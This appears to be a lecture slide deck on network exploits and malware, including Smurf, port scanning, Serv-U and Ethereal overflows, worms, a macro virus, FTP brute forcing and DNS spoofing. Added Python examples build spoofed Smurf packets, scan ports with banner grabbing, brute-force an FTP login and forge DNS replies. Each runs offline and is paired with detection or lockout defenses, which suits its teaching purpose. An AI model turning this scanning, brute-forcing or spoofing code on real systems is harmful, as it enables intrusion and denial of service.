Exploits

Dalia Solomon

Upload: ariel-lee

Post on 18-Dec-2015



Categories
• Trojan Horse attacks
• Smurf attack
• Port scan
• Buffer overflow
• FTP exploits
• Ethereal exploit
• Worm
• Virus
• Password cracker
• DNS spoofing

Trojan Horse attacks

A computer becomes vulnerable to this attack when the user downloads and installs a file that carries the Trojan onto their system.

The installed program opens a listening port without the user's knowledge. That open port gives a remote attacker access to the computer.

Trojan Horse - NetBus

NetBus is a tool that lets a remote user gain administrator-level control of the infected computer.

NetBus consists of two programs: a server and a client.

NetBus Server

To infect a computer, NetBus disguises itself as an ICQ executable file that a naive user installs on their computer.

NetBus server - this application opens a backdoor on the target computer. It can be configured to be either invisible or visible to the user.

NetBus Client

NetBus client - this application connects to a computer that is running the NetBus server. It allows the attacker to spy on and take control of the infected computer.

Smurf Attack

A Smurf attack occurs when a packet, here an ICMP echo request, is sent to the broadcast address of a network so that every host on that network receives a copy.

The packet's source address is forged to be the IP address of the target computer (or network). Every host that answers sends its echo reply to the target, so one spoofed packet produces a flood of replies that can overwhelm the target machine and its link. The network whose broadcast address is abused is the "amplifier"; routers that drop directed broadcasts at the border (the default since RFC 2644) cannot be used as one.

Smurf Attack - demo

Here we are attacking our own computer.
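The packet the slide describes, built as raw bytes, together with the ingress check a border router or IDS applies to refuse to act as an amplifier. This is an added example, not code from the slides; the 192.168.1.0/24 network and the addresses in it are constructed for the demo, and nothing is sent on the wire.

```python
"""Smurf packet construction and detection.

Added example (not code from the slides): builds the spoofed ICMP echo
request described above as raw bytes and shows the router/IDS check that
catches it.  Nothing is sent; the network 192.168.1.0/24 and the
addresses used are constructed for the demo."""
import ipaddress
import struct


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_smurf_packet(victim: str, broadcast: str, ident: int = 0x1234,
                       seq: int = 1, payload: bytes = b"A" * 56) -> bytes:
    """IPv4 + ICMP echo request.  The source is the *victim* (spoofed) and
    the destination is the amplifier network's directed-broadcast address,
    so every host that answers sends its echo reply to the victim."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload  # type 8 = echo request
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + len(icmp), 0xABCD, 0, 64, 1, 0,
                     ipaddress.ip_address(victim).packed,
                     ipaddress.ip_address(broadcast).packed)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def is_smurf_candidate(packet: bytes, local_net: str) -> bool:
    """Ingress check for the amplifier network's border router: an ICMP
    echo request to our directed-broadcast address from a source that is
    not on our network is a Smurf attempt and should be dropped."""
    if len(packet) < 28 or packet[0] >> 4 != 4:
        return False
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8:      # protocol 1 = ICMP
        return False
    src = ipaddress.ip_address(packet[12:16])
    dst = ipaddress.ip_address(packet[16:20])
    net = ipaddress.ip_network(local_net)
    return packet[ihl] == 8 and dst == net.broadcast_address and src not in net


def amplification(local_net: str) -> int:
    """Replies the victim receives per spoofed packet if every host answers."""
    return ipaddress.ip_network(local_net).num_addresses - 2


if __name__ == "__main__":
    pkt = build_smurf_packet("10.0.0.5", "192.168.1.255")
    print(len(pkt), "bytes;",
          "smurf" if is_smurf_candidate(pkt, "192.168.1.0/24") else "ok",
          "x%d amplification" % amplification("192.168.1.0/24"))
```

The same check, applied on the victim side, is weaker: the replies arriving there are ordinary echo replies from real hosts, which is why the filtering has to happen at the amplifier's border.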

Port Scan

A port scanner lets the attacker probe a target computer to find open ports.

It is used mainly to find listening services; their banners and version numbers point to vulnerable applications on the target.
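A minimal TCP connect() scanner of the kind the slide shows, with banner grabbing, which is the step that turns "port open" into "vulnerable version". This is an added example, not the tool from the slides. To keep it self-contained it starts a throwaway listener on 127.0.0.1; that listener, its ephemeral port and the "220 demo-ftp" banner are constructed for the demo.

```python
"""TCP connect() port scan with banner grabbing.

Added example, not the scanner shown in the slides.  A throwaway
listener on 127.0.0.1 (its port and the "220 demo-ftp" banner are
constructed for the demo) makes the scan self-contained and offline."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a full TCP handshake completes, i.e. something is listening."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def grab_banner(host: str, port: int, timeout: float = 0.5) -> bytes:
    """Read whatever the service volunteers on connect (FTP/SMTP/SSH do);
    that text is what fingerprints a vulnerable version."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(256)
    except OSError:
        return b""


def scan(host: str, ports, workers: int = 32) -> dict:
    """Return {open_port: banner} for the given ports, probing in parallel."""
    found = {}

    def work(port):
        if probe(host, port):
            found[port] = grab_banner(host, port)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(work, ports))
    return found


def start_demo_listener(banner: bytes):
    """Bind an ephemeral port on localhost and send `banner` to each client.
    Returns (server_socket, port); close the socket to stop it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:      # probe() hung up without reading
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def closed_port() -> int:
    """A localhost port that was free a moment ago, for a negative probe."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_demo_listener(b"220 demo-ftp ready\r\n")
    for p, banner in sorted(scan("127.0.0.1", range(port - 5, port + 6)).items()):
        print("%d/tcp open  %s" % (p, banner.decode(errors="replace").strip()))
    srv.close()
```

A connect() scan completes the handshake, so every probe shows up in the target's service logs; SYN scans avoid that but need raw sockets. Either way the scanner's parallelism, not the per-port timeout, decides how long a range takes.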

Buffer Overflow

• The most common form of exploit at the time of these slides
• Occurs when more data is written into a buffer than it can hold
• Happens when the program does not check the bounds of the buffer before writing
• The attacker's goal is to overwrite adjacent memory (a return address, a function pointer or a flag) so that the program executes the attacker's code with the program's privileges

FTP Exploits

This exploit shows how somebody can get a shell (command prompt) from a Serv-U FTP server.

It triggers a buffer overflow in Serv-U FTP when the server parses an overlong argument to the MDTM command.

The exploit requires that the attacker already has login access to the server.

This shows how the attacker gains shell access to the target machine.

Here is a segment of the code that causes the buffer overflow.

Ethereal Exploit

Vulnerabilities exist in Ethereal (now Wireshark). By sending carefully crafted packets onto the sniffed wire, or by convincing someone to load a malicious packet capture file into Ethereal, an attacker can overflow a buffer in a protocol dissector and execute malicious code with the privileges of the Ethereal process, which is usually run as root so that it can capture packets.

• The vulnerabilities were in the dissectors for the following protocols: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP.

Ethereal - example

Ethereal IGAP message
• This exploits a vulnerability in Ethereal's handling of IGAP messages
• Works on Ethereal 0.10.0 through 0.10.2
• Will either crash Ethereal or open a port that allows a user to gain root privileges

This code creates a malformed IGAP header that, when sent on the wire, causes Ethereal to crash because of its flawed handling of IGAP packets.

Worm

A worm is a program that makes copies of itself and spreads to other machines on its own; its payload can cause major damage to files, software and data.

Methods of replication include
• Email
• File sharing

Worm - example: W32/Bugbear-A

• A network worm that spreads by emailing copies of itself as attachments
• It creates a thread that attempts to terminate anti-virus and security programs
• It logs keystrokes and sends them out when the user is online
• It opens port 80 on the infected computer

http://www.sophos.com/virusinfo/analyses/w32bugbeara.html

Worm - example: W32/MyDoom-A

W32/MyDoom-A is a worm that spreads by email.

When the infected attachment is launched, the worm harvests email addresses from address books and from files with the following extensions: WAB, TXT, HTM, SHT, PHP, ASP, DBX, TBB, ADB and PL.

Attached files have an extension of BAT, CMD, EXE, PIF, SCR or ZIP.

The worm attempts a denial-of-service attack against www.sco.com by sending numerous GET requests to its web server.

It drops a file named shimgapi.dll into the temp or system folder. This is a backdoor program, loaded by the worm, that allows outsiders to connect to TCP port 3127.

http://www.sophos.com/virusinfo/analyses/w32mydooma.html

Virus

A virus is a program that infects the operating system and applications by attaching itself to existing files and runs when the host file is opened or executed.

Replication methods
• Application files (e.g. a Word document with macros)
• Hard drive or boot record (boot disk)
• Scripts (batch file)

Virus - example

W97M/Marker is a Word macro virus.

It collects user information from Word and sends it out through FTP.

It appends a log entry to the end of the virus body for every infected user. This log contains the system time and date and the user's name and address.

When you open a document file it displays a message.

Depending on the user's response, the user gets one of these messages.

Password Cracker

Some applications and web pages are vulnerable to remote password-cracking tools.

Services such as HTTP, FTP and telnet that do not handle logins properly (no lockout, no delay or rate limit after failed attempts) and that allow short passwords are vulnerable to brute-force password crackers.

Password cracker

Brutus is a remote password-cracking tool. Against an older Serv-U v2.5 FTP server it can recover a password by sequentially trying every possible password combination.
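The sequential attack the slide describes, run against an FTP login, and the account lockout that defeats it. This is an added example; it is neither Brutus nor Serv-U. DemoFtpServer is a constructed in-process stand-in that speaks only the USER/PASS/QUIT part of FTP, and the account "demo" with its two-letter password is made up so that the search finishes in seconds.

```python
"""Sequential password brute force against an FTP login, and the lockout
that stops it.

Added example; it is not Brutus and not Serv-U.  DemoFtpServer is a
constructed in-process stand-in that speaks only the USER/PASS/QUIT part
of FTP; the account "demo" and its two-letter password are made up so the
search finishes quickly."""
import itertools
import socket
import string
import threading


class DemoFtpServer:
    """max_failures=None behaves like the slide's Serv-U 2.5: unlimited
    tries.  A number locks the account after that many bad passwords."""

    def __init__(self, user, password, max_failures=None):
        self.user, self.password, self.max_failures = user, password, max_failures
        self.failures = 0
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:                      # server closed
                return
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        with conn:
            try:
                conn.sendall(b"220 demo FTP ready\r\n")
                user = None
                for raw in conn.makefile("rb"):
                    cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
                    cmd = cmd.upper()
                    if cmd == "USER":
                        user = arg
                        conn.sendall(b"331 Password required\r\n")
                    elif cmd == "PASS":
                        if self.max_failures is not None and self.failures >= self.max_failures:
                            conn.sendall(b"530 Account locked\r\n")
                        elif (user, arg) == (self.user, self.password):
                            conn.sendall(b"230 Logged in\r\n")
                        else:
                            self.failures += 1
                            conn.sendall(b"530 Login incorrect\r\n")
                    elif cmd == "QUIT":
                        conn.sendall(b"221 Bye\r\n")
                        return
            except OSError:                      # client went away
                pass

    def close(self):
        self.sock.close()


def try_login(host, port, user, password, timeout=5.0):
    """One login attempt.  Returns (code, text) of the reply to PASS."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        f.readline()                                         # 220 banner
        s.sendall(("USER %s\r\n" % user).encode())
        f.readline()                                         # 331
        s.sendall(("PASS %s\r\n" % password).encode())
        reply = f.readline().decode(errors="replace").strip()
        s.sendall(b"QUIT\r\n")
        return int(reply[:3]), reply


def brute_force(host, port, user, alphabet=string.ascii_lowercase, length=2):
    """Try every password of `length` over `alphabet` in order, the way
    Brutus's sequential mode does.  Returns (password or None, attempts)."""
    attempts = 0
    for combo in itertools.product(alphabet, repeat=length):
        attempts += 1
        guess = "".join(combo)
        code, text = try_login(host, port, user, guess)
        if code == 230:
            return guess, attempts
        if "locked" in text:                     # further guesses are pointless
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    for limit in (None, 5):
        srv = DemoFtpServer("demo", "kz", max_failures=limit)
        print("lockout=%s ->" % limit, brute_force("127.0.0.1", srv.port, "demo"))
        srv.close()
```

With no lockout the two-letter password falls after at most 676 attempts; the keyspace, not the server, is the only limit, which is the "small size password" point from the previous slide. A lockout (or an increasing delay after each failure) bounds the attacker's attempts regardless of password length, at the cost of letting an attacker lock out a legitimate user.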

DNS spoofing

A DNS attack in which the attacker intercepts (or merely observes) a user's DNS query and sends a forged DNS response to the user before the real answer arrives.

The attack sends the user to a different address from the one he wanted to reach.

DNS spoofing

WinDNSSpoof
• spoofs DNS packets
• http://www.securesphere.net/download/papers/dnsspoof.htm

DNS Exploitation Tool

Zodiac is a robust DNS protocol monitoring and spoofing program.

Features:
• Captures and decodes DNS packets
• DNS local spoofing
• DNS ID spoofing, exploiting a weakness in the DNS protocol itself: a reply is accepted if its 16-bit transaction ID matches the outstanding query, so an attacker who guesses the ID can answer first
• Etc.

http://teso.scene.at/projects/zodiac/http://teso.scene.at/projects/zodiac/
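The ID-spoofing weakness from the Zodiac slide, worked through on the wire format: a forged A-record reply, and the only checks a resolver can apply to it. This is an added example, not code from Zodiac or WinDNSSpoof; names and addresses are made up, compression pointers are not handled, and nothing is sent on the network.

```python
"""DNS ID spoofing and the resolver-side checks a forged reply must pass.

Added example; it is not code from Zodiac or WinDNSSpoof.  Builds a DNS
query and a forged A-record response as raw wire format (no compression
pointers) and shows why a predictable transaction ID and source port let
the attacker's answer win.  Names and addresses are made up; nothing is
sent on the network."""
import random
import struct


def encode_name(name: str) -> bytes:
    """Dotted name -> length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.strip(".").split(".")) + b"\x00"


def decode_name(msg: bytes, off: int):
    """Parse a label sequence at `off`; returns (name, offset after it)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:                     # compression pointer: not produced here
            raise ValueError("compressed names not supported")
        labels.append(msg[off:off + n].decode())
        off += n


def build_query(txid: int, name: str) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)     # RD=1, one question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # type A, class IN


def build_response(txid: int, name: str, ip: str, ttl: int = 300) -> bytes:
    """A reply carrying one A record.  The legitimate server and the spoofer
    build exactly the same thing; only knowledge of txid/port differs."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)     # QR=1 RD=1 RA=1
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(msg: bytes) -> dict:
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question response")
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(ancount):
        aname, off = decode_name(msg, off)
        atype, aclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if atype == 1 and rdlen == 4:
            answers.append(".".join(str(b) for b in rdata))
    return {"id": txid, "qname": qname, "qtype": qtype, "answers": answers}


class PendingQuery:
    """What a resolver remembers about an outstanding query.  Old resolvers
    used a sequential txid and a fixed source port, which is the weakness
    ID spoofing exploits; randomising both makes a blind guess ~1 in 2^32."""

    def __init__(self, name: str, txid: int = None, sport: int = None):
        self.name = name
        self.txid = random.randrange(1 << 16) if txid is None else txid
        self.sport = random.randrange(1024, 1 << 16) if sport is None else sport

    def accepts(self, reply: bytes, dst_port: int) -> bool:
        """The only checks plain DNS has: the reply must arrive on our source
        port and carry our ID and our question."""
        if dst_port != self.sport:
            return False
        try:
            r = parse_response(reply)
        except (ValueError, IndexError, struct.error):
            return False
        return (r["id"] == self.txid and r["qtype"] == 1
                and r["qname"].lower() == self.name.lower())


if __name__ == "__main__":
    # Constructed scenario: a resolver with guessable state (ID 0x1234, port 53)
    victim = PendingQuery("www.example.com", txid=0x1234, sport=53)
    forged = build_response(0x1234, "www.example.com", "10.66.66.1")
    print("predictable resolver accepts forged reply:", victim.accepts(forged, 53))
    hardened = PendingQuery("www.example.com")
    print("randomised resolver accepts same reply:", hardened.accepts(forged, 53))
```

The forged reply is indistinguishable from a genuine one at the wire level; the race is won by whoever delivers a matching ID to the right port first. Source-port randomisation and, properly, DNSSEC signatures are what take the guesswork out of the attacker's favour.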

Questions?Questions?